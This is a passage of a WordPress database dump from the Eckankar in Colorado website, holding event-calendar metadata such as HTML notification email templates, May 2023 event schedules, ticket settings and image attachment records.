margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9934:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(182119,268426,'mec_event_status','EventScheduled'),(182120,268426,'mec_moved_online_link',''),(182121,268426,'mec_cancelled_reason',''),(182122,268426,'mec_display_cancellation_reason_in_single_page',''),(182123,268426,'protect_children',''),(182124,268426,'passster_activate_global_protection',NULL),(182125,268426,'passster_activate_protection',NULL),(182126,268426,'passster_protection_type','password'),(182127,268426,'boldgrid_hide_page_title','0'),(182128,268426,'_thumbnail_id','266472'),(182129,268426,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(182130,268426,'boldgrid_in_page_containers','1'),(182131,268426,'passster_area_shortcode',''),(182133,268426,'_dp_original','268425'),(182134,268426,'_edit_lock','1682307219:2'),(182135,268426,'_edit_last','2'),(182136,268427,'protect_children',''),(182137,268427,'mec_color',''),(182138,268427,'mec_location_id','185'),(182139,268427,'mec_dont_show_map','0'),(182140,268427,'mec_organizer_id','1'),(182141,268427,'mec_start_date','2023-05-28'),(182142,268427,'mec_start_time_hour','10'),(182143,268427,'mec_start_time_minutes','30'),(182144,268427,'mec_start_time_ampm','AM'),(182145,268427,'mec_start_day_seconds','37800'),(182146,268427,'mec_end_date','2023-05-28'),(182147,268427,'mec_end_time_hour','11'),(182148,268427,'mec_end_time_minutes','30'),(182149,268427,'mec_end_time_ampm','AM'),(182150,268427,'mec_end_day_seconds','41400'),(182151,268427,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-28\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-28\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(182152,268427,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(182153,268427,'mec_certain_weekdays','a:0:{}'),(182154,268427,'mec_allday','0'),(182155,268427,'mec_hide_time','0'),(182156,268427,'mec_hide_end_time','0'),(182157,268427,'mec_comment',''),(182158,268427,'mec_repeat_status','0'),(182159,268427,'mec_repeat_type',''),(182160,268427,'mec_repeat_interval','1'),(182161,268427,'mec_repeat_end',''),(182162,268427,'mec_repeat_end_at_occurrences',''),(182163,268427,'mec_repeat_end_at_date',''),(182164,268427,'mec_advanced_days','a:0:{}'),(182165,268427,'mec_in_days',''),(182166,268427,'mec_not_in_days',''),(182167,268427,'mec_hourly_schedules','a:0:{}'),(182168,268427,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(182169,268427,'mec_tickets','a:0:{}'),(182170,268427,'mec_fees_global_inheritance','1'),(182171,268427,'mec_fees','a:0:{}'),(182172,268427,'mec_ticket_variations_global_inheritance','1'),(182173,268427,'mec_ticket_variations','a:0:{}'),(182174,268427,'mec_reg_fields_global_inheritance','1'),(182175,268427,'mec_reg_fields','a:0:{}'),(182176,268427,'mec_op','a:0:{}'),(182177,268427,'mec_event_date_submit','20210422105713'),(182178,268427,'mec_read_more',''),(182179,268427,'mec_more_info',''),(182180,268427,'mec_more_info_title',''),(182181,268427,'mec_more_info_target','_self'),(182182,268427,'mec_cost',''),(182183,268427,'mec_currency','a:0:{}'),(182184,268427,'mec_additional_organizer_ids','a:0:{}'),(182185,268427,'mec_additional_location_ids','a:0:{}'),(182186,268427,'one_occurrence','0'),(182187,268427,'mec_timezone','global'),(182188,268427,'mec_countdown_method','global'),(182189,268427,'mec_public','1'),(182190,268427,'mec_bfixed_fields','a:0:{}'),(182191,268427,'mec_fields','a:0:{}'),(182192,268427,'mec_event_status','EventScheduled'),(182193,268427,'mec_moved_online_link',''),(182194,268427,'mec_cancelled_reason',''),(182195,268427,'mec_display_cancellation_reason_in_single_page',''),(182196,268427,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(182197,268427,'passster_activate_global_protection',NULL),(182198,268427,'passster_activate_protection',NULL),(182199,268427,'passster_protection_type','password'),(182200,268427,'_wp_old_date','2022-01-18'),(182201,268427,'boldgrid_in_page_containers','1'),(182202,268427,'_dp_original','265425'),(182203,268427,'_edit_lock','1682308515:2'),(182204,268427,'passster_area_shortcode',''),(182205,268427,'_edit_last','2'),(182206,268427,'_thumbnail_id','268429'),(182207,266545,'passster_area_shortcode',''),(182208,268429,'_wp_attached_file','2023/04/hu-6.jpg'),(182209,268429,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:840;s:6:\"height\";i:422;s:4:\"file\";s:16:\"2023/04/hu-6.jpg\";s:8:\"filesize\";i:95385;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"hu-6-300x151.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14891;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"hu-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7380;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:16:\"hu-6-768x386.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:69488;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:16:\"hu-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21585;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:16:\"hu-6-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37382;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:16:\"hu-6-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27085;}s:8:\"tileview\";a:5:{s:4:\"file\";s:16:\"hu-6-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24045;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(182210,268429,'original-file','2023/04/hu-6-updraft-pre-smush-original.jpg'),(182211,268429,'smush-complete','1'),(182212,268429,'smush-info','The file was compressed from 93.15 KB to 90.01 KB saving 3.37 percent using WP-Optimize'),(182213,268429,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:95385;s:12:\"smushed-size\";i:92169;s:15:\"savings-percent\";d:3.37000000000000010658141036401502788066864013671875;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:95385;s:10:\"compressed\";i:92169;}s:6:\"medium\";a:2:{s:8:\"original\";i:14891;s:10:\"compressed\";i:14679;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7380;s:10:\"compressed\";i:7314;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:69488;s:10:\"compressed\";i:68774;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:21585;s:10:\"compressed\";i:21585;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:37382;s:10:\"compressed\";i:37194;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:27085;s:10:\"compressed\";i:26958;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24045;s:10:\"compressed\";i:24045;}}}'),(182214,268430,'mec_color',''),(182215,268430,'mec_location_id','118'),(182216,268430,'mec_dont_show_map','0'),(182217,268430,'mec_organizer_id','1'),(182218,268430,'mec_read_more',''),(182219,268430,'mec_more_info',''),(182220,268430,'mec_more_info_title',''),(182221,268430,'mec_more_info_target','_self'),(182222,268430,'mec_cost',''),(182223,268430,'mec_currency','a:0:{}'),(182224,268430,'mec_additional_organizer_ids','a:0:{}'),(182225,268430,'mec_additional_location_ids','a:0:{}'),(182226,268430,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-07\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-07\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(182227,268430,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(182228,268430,'mec_certain_weekdays','a:0:{}'),(182229,268430,'mec_allday','0'),(182230,268430,'one_occurrence','0'),(182231,268430,'mec_hide_time','0'),(182232,268430,'mec_hide_end_time','0'),(182233,268430,'mec_comment',''),(182234,268430,'mec_timezone','global'),(182235,268430,'mec_countdown_method','global'),(182236,268430,'mec_public','1'),(182237,268430,'mec_start_date','2023-05-07'),(182238,268430,'mec_start_time_hour','10'),(182239,268430,'mec_start_time_minutes','30'),(182240,268430,'mec_start_time_ampm','AM'),(182241,268430,'mec_start_day_seconds','37800'),(182242,268430,'mec_end_date','2023-05-07'),(182243,268430,'mec_end_time_hour','11'),(182244,268430,'mec_end_time_minutes','30'),(182245,268430,'mec_end_time_ampm','PM'),(182246,268430,'mec_end_day_seconds','84600'),(182247,268430,'mec_repeat_status','0'),(182248,268430,'mec_repeat_type',''),(182249,268430,'mec_repeat_interval','1'),(182250,268430,'mec_repeat_end',''),(182251,268430,'mec_repeat_end_at_occurrences',''),(182252,268430,'mec_repeat_end_at_date',''),(182253,268430,'mec_advanced_days','a:0:{}'),(182254,268430,'mec_in_days',''),(182255,268430,'mec_not_in_days',''),(182256,268430,'mec_hourly_schedules','a:0:{}'),(182257,268430,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(182258,268430,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:32:\"Experience HU, The Sound of Soul\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register 